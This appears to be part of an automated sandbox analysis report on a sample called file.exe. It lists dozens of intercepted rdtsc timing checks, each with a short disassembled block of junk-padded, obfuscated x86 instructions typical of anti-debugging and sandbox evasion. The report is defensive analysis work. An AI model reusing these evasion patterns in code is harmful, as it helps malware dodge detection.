              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F256C second address: 3F2588 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jp 00007F80AC503260h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 je 00007F80AC503246h 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F29C2 second address: 3F29C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F29C6 second address: 3F29CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F29CC second address: 3F29D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F29D2 second address: 3F29DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F80AC503246h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F29DE second address: 3F29EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F29EA second address: 3F29EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F29EE second address: 3F29F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F29F2 second address: 3F29F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F29F8 second address: 3F2A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F2A04 second address: 3F2A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F2CF2 second address: 3F2D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnc 00007F80ACC6677Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop edi 0x00000013 pushad 0x00000014 js 00007F80ACC66776h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F2D12 second address: 3F2D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F80AC503252h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F2D29 second address: 3F2D33 instructions: 0x00000000 rdtsc 0x00000002 js 00007F80ACC6678Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F47F6 second address: 3F4802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F80AC503246h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F4802 second address: 3F4824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F80ACC6678Dh 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F80ACC66785h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F70FA second address: 3F7100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F7100 second address: 3F710D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F721F second address: 3F7224 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F7426 second address: 3F746D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 sub edx, 71E38B7Ah 0x0000000e push 00000004h 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F80ACC66778h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a call 00007F80ACC66779h 0x0000002f push eax 0x00000030 push edx 0x00000031 push edi 0x00000032 js 00007F80ACC66776h 0x00000038 pop edi 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F746D second address: 3F749C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F80AC503246h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ebx 0x00000010 jl 00007F80AC503255h 0x00000016 jmp 00007F80AC50324Fh 0x0000001b pop ebx 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F749C second address: 3F74A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F74A0 second address: 3F74DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F80AC503248h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F80AC503257h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F80AC50324Dh 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F74DD second address: 3F74E3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F8EE0 second address: 3F8F41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC503250h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pushad 0x0000000b jmp 00007F80AC503252h 0x00000010 jmp 00007F80AC503250h 0x00000015 pushad 0x00000016 jmp 00007F80AC503255h 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F80AC50324Ch 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F8AEE second address: 3F8AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F80ACC66776h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F8AFC second address: 3F8B00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 319C2F second address: 319C39 instructions: 0x00000000 rdtsc 0x00000002 js 00007F80ACC6677Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 319E4E second address: 319E54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 319E54 second address: 319E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA028D second address: 4FA0293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA0293 second address: 4FA02F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80ACC66783h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F80ACC66781h 0x00000016 sbb si, 3186h 0x0000001b jmp 00007F80ACC66781h 0x00000020 popfd 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F80ACC66783h 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA02F5 second address: 4FA030D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F80AC503254h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA030D second address: 4FA0311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC058D second address: 4FC05D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F80AC50324Fh 0x00000009 xor ax, 460Eh 0x0000000e jmp 00007F80AC503259h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F80AC50324Ah 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC05D1 second address: 4FC065E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F80ACC66781h 0x00000009 and ecx, 2BA978F6h 0x0000000f jmp 00007F80ACC66781h 0x00000014 popfd 0x00000015 mov ax, B9E7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d jmp 00007F80ACC6677Ah 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F80ACC6677Dh 0x0000002d adc cx, 5506h 0x00000032 jmp 00007F80ACC66781h 0x00000037 popfd 0x00000038 pushfd 0x00000039 jmp 00007F80ACC66780h 0x0000003e sub eax, 3EA5EBA8h 0x00000044 jmp 00007F80ACC6677Bh 0x00000049 popfd 0x0000004a popad 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC065E second address: 4FC0697 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC503259h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov al, D1h 0x0000000d mov si, di 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F80AC503251h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0697 second address: 4FC06A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F80ACC6677Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC06A7 second address: 4FC06F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F80AC50324Dh 0x00000010 and si, 5A86h 0x00000015 jmp 00007F80AC503251h 0x0000001a popfd 0x0000001b mov dx, cx 0x0000001e popad 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F80AC503259h 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC06F6 second address: 4FC0706 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F80ACC6677Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0706 second address: 4FC070A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC070A second address: 4FC0740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F80ACC66783h 0x00000012 jmp 00007F80ACC66783h 0x00000017 popfd 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0740 second address: 4FC0745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0745 second address: 4FC075B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F80ACC66782h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC075B second address: 4FC07D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007F80AC503257h 0x0000000e lea eax, dword ptr [ebp-04h] 0x00000011 jmp 00007F80AC503256h 0x00000016 nop 0x00000017 jmp 00007F80AC503250h 0x0000001c push eax 0x0000001d jmp 00007F80AC50324Bh 0x00000022 nop 0x00000023 jmp 00007F80AC503256h 0x00000028 push dword ptr [ebp+08h] 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC07D1 second address: 4FC07D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC07D5 second address: 4FC07F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC503259h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC081C second address: 4FC0851 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, C83Bh 0x00000007 push eax 0x00000008 pop edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c cmp dword ptr [ebp-04h], 00000000h 0x00000010 jmp 00007F80ACC6677Ah 0x00000015 mov esi, eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F80ACC66787h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0851 second address: 4FC0893 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F80AC503252h 0x00000009 xor si, 3018h 0x0000000e jmp 00007F80AC50324Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 je 00007F80AC5032AEh 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007F80AC50324Eh 0x00000025 popad 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC08BB second address: 4FC091C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, bh 0x00000005 pushfd 0x00000006 jmp 00007F80ACC66786h 0x0000000b sbb ch, 00000038h 0x0000000e jmp 00007F80ACC6677Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F80ACC6677Bh 0x00000022 xor esi, 105434FEh 0x00000028 jmp 00007F80ACC66789h 0x0000002d popfd 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC091C second address: 4FC0921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0921 second address: 4FC0927 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0927 second address: 4FC092B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC092B second address: 4FC092F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC092F second address: 4FC0953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F80AC503257h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0953 second address: 4FC0959 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0959 second address: 4FC098B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC503254h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F80AC503257h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC098B second address: 4FC0059 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c sub esp, 04h 0x0000000f xor ebx, ebx 0x00000011 cmp eax, 00000000h 0x00000014 je 00007F80ACC668C5h 0x0000001a xor eax, eax 0x0000001c mov dword ptr [esp], 00000000h 0x00000023 mov dword ptr [esp+04h], 00000000h 0x0000002b call 00007F80B1AF22CBh 0x00000030 mov edi, edi 0x00000032 jmp 00007F80ACC66780h 0x00000037 xchg eax, ebp 0x00000038 jmp 00007F80ACC66780h 0x0000003d push eax 0x0000003e pushad 0x0000003f mov dh, 11h 0x00000041 popad 0x00000042 xchg eax, ebp 0x00000043 jmp 00007F80ACC66784h 0x00000048 mov ebp, esp 0x0000004a jmp 00007F80ACC66780h 0x0000004f push FFFFFFFEh 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 mov bl, 67h 0x00000056 pushad 0x00000057 popad 0x00000058 popad 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0059 second address: 4FC00D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC503255h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 53B7C7C9h 0x0000000e jmp 00007F80AC503257h 0x00000013 xor dword ptr [esp], 252D5981h 0x0000001a pushad 0x0000001b call 00007F80AC503254h 0x00000020 mov cx, 6FD1h 0x00000024 pop eax 0x00000025 mov edx, 5A6203C2h 0x0000002a popad 0x0000002b call 00007F80AC503249h 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F80AC503254h 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC00D4 second address: 4FC00E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F80ACC6677Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC00E6 second address: 4FC00EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC00EA second address: 4FC01A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F80ACC6677Eh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F80ACC6677Bh 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F80ACC6677Fh 0x00000020 add esi, 66133D7Eh 0x00000026 jmp 00007F80ACC66789h 0x0000002b popfd 0x0000002c mov ecx, 620F7BC7h 0x00000031 popad 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 jmp 00007F80ACC6677Dh 0x0000003b pop eax 0x0000003c pushad 0x0000003d jmp 00007F80ACC6677Ch 0x00000042 call 00007F80ACC66782h 0x00000047 jmp 00007F80ACC66782h 0x0000004c pop eax 0x0000004d popad 0x0000004e mov eax, dword ptr fs:[00000000h] 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F80ACC6677Ch 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC01A2 second address: 4FC01FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC50324Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F80AC503254h 0x00000011 sbb ecx, 56D18798h 0x00000017 jmp 00007F80AC50324Bh 0x0000001c popfd 0x0000001d mov edx, ecx 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F80AC503255h 0x00000026 nop 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC01FA second address: 4FC01FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC01FE second address: 4FC0204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0204 second address: 4FC020A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC020A second address: 4FC026A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC50324Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 18h 0x0000000e jmp 00007F80AC503250h 0x00000013 xchg eax, ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov di, 73A0h 0x0000001b pushfd 0x0000001c jmp 00007F80AC503259h 0x00000021 add esi, 31A16AA6h 0x00000027 jmp 00007F80AC503251h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC026A second address: 4FC02A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80ACC66781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c movzx ecx, bx 0x0000000f pop edx 0x00000010 mov ax, 44DBh 0x00000014 popad 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F80ACC66788h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC02A8 second address: 4FC02AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC02AC second address: 4FC02B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC02B2 second address: 4FC0308 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC50324Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F80AC503250h 0x0000000f push eax 0x00000010 jmp 00007F80AC50324Bh 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 mov edx, ecx 0x00000019 push eax 0x0000001a jmp 00007F80AC503257h 0x0000001f pop esi 0x00000020 popad 0x00000021 push ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 movsx edx, ax 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0308 second address: 4FC030D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC030D second address: 4FC0314 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0314 second address: 4FC033D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F80ACC66788h 0x00000012 movzx ecx, di 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC033D second address: 4FC0344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
